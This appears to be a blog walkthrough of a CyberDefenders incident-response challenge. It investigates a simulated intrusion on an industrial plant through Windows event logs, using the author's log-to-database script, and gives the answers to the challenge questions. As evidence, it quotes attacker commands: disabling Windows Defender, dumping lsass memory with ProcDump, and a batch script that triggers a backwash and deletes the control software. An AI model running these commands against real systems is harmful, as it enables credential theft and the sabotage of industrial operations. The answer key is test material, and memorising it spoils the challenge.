Windows Event Logs Analysis Challenge, and I am happy to introduce my rebrand of my old script to make a sqlite database out of Windows Event Logs!!!
Information
Category Name: Hafinum-APT
Scenario:
You work as an incident responder for a consulting firm that specializes in digital forensics and incident response. You are assigned to investigate a security incident that occurred at a manufacturing plant that produces electronic components. The plant uses a variety of industrial control systems (ICS) to manage their production lines and other critical operations.
The security team at the plant detected suspicious network activity from an external IP address associated with the Hafnium threat actor group.
Your task is to investigate the incident and determine the extent of the compromise, the attacker’s objectives, and the potential impact on the plant’s operations. You have been provided with log files from the plant’s servers and workstations, which include Windows event logs and TeamViewer logs. You must analyze the logs and gathering information about the attacker’s activity.
Files:
c83-HAFINUM.zip 5.03 GB
-winevt.zip 15.2 MB
– c83-Hafinum.ova 5.01 GB
My Recommendations
Download it from CyberDefenders and verify it with:
sha1sum /path/to/c83-HAFINUM.zipSHA1SUM: 9c41911c6a0fbd11e198a37b0da0fe32156b0ba0
Walkthrough
For this challenge, I decided to upgrade an old script I wrote for the CyperCorp Case 1 challenge. This time, it’s faster and more efficient. I also dumped as many event descriptions as I could to populate the database. Makes things sooo much easier to analyze logs 😛 Here’s the link to the github repo. If you plan on using it, plssss make sure to install the dependencies first :))
python3.11 evtx2db.py -i c83-Hafinum/winevt/Logs -o c83-Hafinum/out -e
There are loads of events here, so the code runs a bit slowly. Here’s an example of the output database:
1. What is the name of the threat detected by Windows Defender?
Filtering the Provider Table with ‘Defender’, and doing a global search for threat, four events that happened around the same time are returned. The four of them report the same threat:
Looking at the Description, Event ID 1116 and Event ID 1117, are critical.
1116: ‘The anti malware platform has detected malware or other potentially unwanted software.’
1117: ‘The anti malware platform has taken action to protect this machine from malware or other potentially unwanted software.
Answer: Trojan:Win32/Ceprolad.A
2. What was the full URL that Windows Defender blocked an archive from being downloaded?
In the same Event Data as above, the Path is saved as:
"Path": "CmdLine:_C:\\Windows\\System32\\certutil.exe -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip"
3. What was the full command used by the attacker to successfully download the archive?
So to filter for a successful download, we can do three things:
- filter the EventData column for http://
- filter the Description column for ‘create’.
- overall filter for procdump
With these filters, two logs are returned, both from Sysmon. The CommandLine argument seems identical, but it differs. Logically, the one that was successful should be the most recent one.
2021-03-12 08:22:34
2021-03-12 08:23:47
Looks like they’re the same, except, in the second one, the second double quote has been moved to the end of the url.
Answer: certutil.exe -urlcache -split -f “https://download.sysinternals.com/files/Procdump.zip” procdump.zip
4. Which user account was the attacker using when the archive was successfully downloaded to the host?
Looking at the same Event, the user is Administrator:
Answer: Administrator
5. What command was used by the attacker on the host to try and disable Windows Defender via the command line?
So we need to filter for dates occuring after the 11th of March. An easy way to stop Windows Defender via CLI, not using Powershell is with Service Control (sc), which was used by the attacker:
Answer: sc stop WinDefend
6. Provide the date and time when Windows Defender's real-time protection was disabled.
SO satisfying. I filtered descriptions with ‘disabled‘, Filename with Defender and only one record popped up. This is for event ID 5001, the description being ‘ Real-time Protection scanning for malware and other potentially unwanted software was disabled.’ The exact timestamp is 2021-03-12 08:21:35.
Answer: 2021-03-12 08:21:35
7. Which version of ProcDump did the attacker run on the host?
Filtering for version in the EventData column, and procdump.exe globally, I get 3 records. Two with event ID 1: Process Create and one for event ID 10: Registry Value Set. All three logs show that the version is 10.0.
Answer: 10.0
8. Where is the executable located on the disk that was targeted by Procdump to dump its process memory?
Keeping the same filter as question 7, the events with ID 1 have a CommandLine:
The other event has the same CommandLine except it is using procdump64.exe. Procdump tried to dump lsass.exe. The executable is located at C:\Windows\System32\lsass.exe.
Answer: C:\Windows\System32\lsass.exe.
9. What was the location of the dump file created from the process dumped with Procdump?
If we look above, the current directory is set to C:\tmp, and the outfile lsass.dp. We can filter the EventData column for lsass.dmp to confirm just in case. A new event with ID 11 (File Create) shows that it was indeed saved to the tmp directory. The executable responsible for that is procdump64.exe.
Answer: C:\tmp\lsass.dmp
10. Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.
This is a bit of a trick question. If we filter for sha256 in EventData column, and TeamViewer overall, there are 76 results. 6 are for event ID 15, ‘File Stream Created’, which is not what we need. The TeamViewer installed, must have gone through event ID 11 (File Created). Filtering for that, and install in the EventData column may give us the installation path, which will make it easier to find its hash:
So we know the path of the image. Now, filtering for sha256 and ‘TeamViewer_.exe’ there are four results. The question asks about installation and the event with record ID 4362 is an install:
In red is the CommandLine showing that this is the installation of Teamviewer. In yellow, it’s the filepath we found before, and in pink, the sha256 hash.
Answer: D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B
11. What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?
So we found that TeamViewer was installed at 2021-03-10 04:40:22. We can filter the ‘Description’ column for ‘DNS Query‘ and the Timestamp with ‘2021-03-10 04:4‘. The first query done by TeamViewer is eventRecordID 4394:
At 2021-03-10 04:40:52.
Answer: router7.teamviewer.com
12. Determine how the attacker gained access to the Administrator account.
Pretty straight forward. Filtering descriptions with ‘Account failed to log’ (event ID 4625), there are 1004 events, all from the same IP address, trying for administrator.
Answer: Brute-force attack
13. What IP address can we send to the Firewall team for blocking?
The IP address associated with the Bruteforce attack is 8.36.216.58:
Answer: 8.36.216.58
14. What was the hostname from where the attacker launched their attack?
In the same Events as the previous questions, all of them have the same ‘WorkstationName’, which is the hostname – ‘FancyPoodle’.
Answer: FancyPoodle
15. Provide the first timestamp from the logs where you can see the attacker was successful login.
This time, we can filter the Descriptions for ‘logged on’ and EventData with ‘FancyPoodle’, the first succesful logon was on 2021-03-11 at 20:26:52.
Answer: 2021-03-11 20:26:52
16. Provide the data in UTC time of when the attacker successfully logged into the host using RDP for the first time.
To filter for RDP events, first, we filter the Provider column with ‘LocalSessionManager‘. Then, we can put ‘logon succeeded’ , or event ID 21.
Looking at the timestamps, it makes sense that the first successful logon was after the Administrator account was brute-forced, meaning the closest timestamp to the previous date is 2021-03-12 08:03:02.
Answer: 2021-03-12 08:03:00
17. When did the attacker log off from the first RDP session?
Doing the opposite than the previous question. Filtering ‘Description’ table with logoff, and keeping the Provider filter. Next, we can filter the timestamps for the Date – 2021-03-12:
The first logoff was at 08:45:02.
Answer: 2021-03-12 08:45:02
18. What command did the attacker run on the host which would've helped him understand what Antivirus software was running on the system?
This one took a while, but I eventuallt went digging into Red Team cheat sheets. In this one, there is a list of commands to run for Defender. Checking every single one of them, ocuring after the 11th, tasklist was executed twice:
Answer: tasklist
19. Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?
Finding executed commands, means we can filter for ‘Process Create’ in descriptions, or event ID 1. We can simply search for common commands . Eventually, there is evidence of ‘ipconfig /all’ having been executed when the attacker compromised the machine:
Answer: ipconfig /all
20. What was the name of the user account added by the attacker?
The event ID for a new user being added is 4720. If we filter for that, we will find four events. BUT, only two occur after the machine was compromised:
The target username is Administrator1.
Answer: Administrator1
21. Based on information from the public, the first visual signs of raw sewage [...]
spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?
First of all, finding the timezone (better late than never!). The logs say that the TimezoneBiasHour is -8, but that doesn’t seem right. After doing some research the event ID that can help narrow it down is 6013. Filtering for the given date, there is the following:
The event ID actually logs how long the system has been running since boot. UTC is 2 hours behind South Africa Standard Time, so we need to look at timestamps around 12:00 – 14:00 in UTC.
To find the file that was created, we can filter Descriptions with ‘File Created’, and the date with ‘2021-03-12 1’. There are 39 logged Events. The first three events show how a file named ‘backwash.bat’ was downloaded over Chrome:
I’m guessing I messed up the Timezone conversion…
Answer: backwash.bat
22. Which application was responsible for downloading the malicious file to the host?
As shown above, the file was downloaded via chrome.
Answer: chrome.exe
23. From which website was this malicious file downloaded?
Now that we have a concrete timestamp, we can remove the Description filters, and keep the date as ‘2021-03-12 11:09’. Out of the 9 logs, event RecordID 12134 has the ‘ReferrurUrl’ in its Contents:
Answer: wetransfer.com
24. After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?
Reversing again… the descriptions for ‘File Created’, and keeping the same Timestamp filter, the file was moved to the main drive C:
Answer: C:\backwash.bat
25. Based on the available logs [...]
there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host.
At this point, we can just filter EventData for the filename. The full contents are shown in EventRecordID 12130
The full contents are:
"start \"C:\\Program Files\\ifak\\SIMBA#4.3\\Simba.exe --function backwash --interruptable no\" timeout /t 30 /nobreak taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T taskkill /F /IM simba.exe /T DEL /F /Q \"C:\\Program Files\\ifak\\SIMBA#4.3\\*\" "
}
So Simba is a wastewater engineering simulation program. The function backwash is executed with:
– timeout
– taskkill
Timeout occurs first. We know the file was downloaded at around 11:08 AM. If we filter for Timestamps ‘2021-03-12 11:‘, and Description for ‘Process Create‘, and scroll scroll scroll, at 11:10:03 ‘timeout.exe’ was executed, with the exact same CommandLine as the Contents of the file:
The Event right before that is for cmd.exe, also at 11:10:03. The next event, exactly 30 seconds later is for taskkill, so we are obviously watching the logs of the file being executed.
Answer: 2021-03-12 11:10:03
26. What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode
The first part of the command, which calls for the function backwash:
C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no
Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe –function backwash –interruptable no
27. Prior to switching to a manual override [...]
the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker's script would have rendered the application unusable?
The last part of the command calls for deleting the entire Program Files directory of Simba, so it would have not been possible ot use the application.
DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"
Answer: DEL /F /Q “C:\Program Files\ifak\SIMBA#4.3\*”
